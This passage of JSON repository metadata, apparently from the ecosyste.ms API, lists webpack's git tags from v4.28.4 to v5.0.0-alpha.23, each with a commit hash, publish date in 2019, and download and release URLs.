es_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/t